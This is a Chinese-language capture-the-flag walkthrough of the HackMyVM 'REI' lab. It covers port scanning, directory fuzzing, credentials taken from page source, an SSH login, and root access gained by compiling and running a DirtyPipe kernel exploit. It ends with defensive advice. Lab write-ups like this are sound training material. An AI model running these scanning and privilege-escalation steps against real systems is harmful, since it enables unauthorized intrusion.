hackmyvm系列8——REI
字数 638 2025-08-12 11:34:24

HackMyVM系列8——REI靶场实战教学文档

一、靶场信息

  • 靶机IP: 192.168.56.170
  • 开放端口: 63777(Web), 22(SSH)
  • 难度等级: 中级

二、信息收集阶段

1. 网络扫描

netdiscover -r 192.168.56.0/24
nmap -sV -Pn -sC -A 192.168.56.170 -p 0-65535

2. Web服务枚举

初始访问Web服务(63777端口)返回404,需要进行目录爆破:

gobuster dir -u http://192.168.56.170:63777/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html

3. 文件扩展名Fuzz

wfuzz -u http://192.168.56.170:63777/indexp.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hl 11

发现有效扩展名后,保存结果并再次进行目录爆破。

三、Web渗透

  1. 访问发现的目录,多数返回403
  2. 通过分析note.html页面获取潜在用户名
  3. 点击人物图像进入子页面,发现关键词:
    • balance (可能密码)
    • karate (可能用户名)

四、SSH登录

  1. 尝试使用karate作为用户名,balance作为密码失败
  2. 查看页面源代码发现另一个潜在用户名:chuck-norris
  3. 成功登录组合: 
    ssh chuck-norris@192.168.56.170
密码: balance

五、权限提升

1. 提权准备

上传提权辅助脚本和exp:

gcc dirtypipez.c -o exp
chmod 777 exp
./exp /usr/bin/mount

2. 获取root权限

  1. 执行exp后可能遇到root.txt访问限制
  2. 查找与用户Maritrini相关的文件: 
    find / -name *maritrini*
  3. 最终获取root flag

六、关键点总结

  1. Web目录爆破时注意404和403响应
  2. 页面源代码分析是获取凭据的关键
  3. 用户名枚举需要结合页面内容多尝试
  4. DirtyPipe漏洞利用是提权的关键
  5. 提权后可能需要进一步查找才能获取完整flag

七、防御建议

  1. 限制Web目录访问权限
  2. 避免在页面源代码中泄露敏感信息
  3. 及时更新系统内核防止已知漏洞利用
  4. 使用强密码并定期更换
  5. 限制SSH登录尝试次数
HackMyVM系列8——REI靶场实战教学文档 一、靶场信息 靶机IP: 192.168.56.170 开放端口: 63777(Web), 22(SSH) 难度等级: 中级 二、信息收集阶段 1. 网络扫描 2. Web服务枚举 初始访问Web服务(63777端口)返回404,需要进行目录爆破: 3. 文件扩展名Fuzz 发现有效扩展名后,保存结果并再次进行目录爆破。 三、Web渗透 访问发现的目录,多数返回403 通过分析note.html页面获取潜在用户名 点击人物图像进入子页面,发现关键词: balance (可能密码) karate (可能用户名) 四、SSH登录 尝试使用karate作为用户名,balance作为密码失败 查看页面源代码发现另一个潜在用户名:chuck-norris 成功登录组合: 五、权限提升 1. 提权准备 上传提权辅助脚本和exp: 2. 获取root权限 执行exp后可能遇到root.txt访问限制 查找与用户Maritrini相关的文件: 最终获取root flag 六、关键点总结 Web目录爆破时注意404和403响应 页面源代码分析是获取凭据的关键 用户名枚举需要结合页面内容多尝试 DirtyPipe漏洞利用是提权的关键 提权后可能需要进一步查找才能获取完整flag 七、防御建议 限制Web目录访问权限 避免在页面源代码中泄露敏感信息 及时更新系统内核防止已知漏洞利用 使用强密码并定期更换 限制SSH登录尝试次数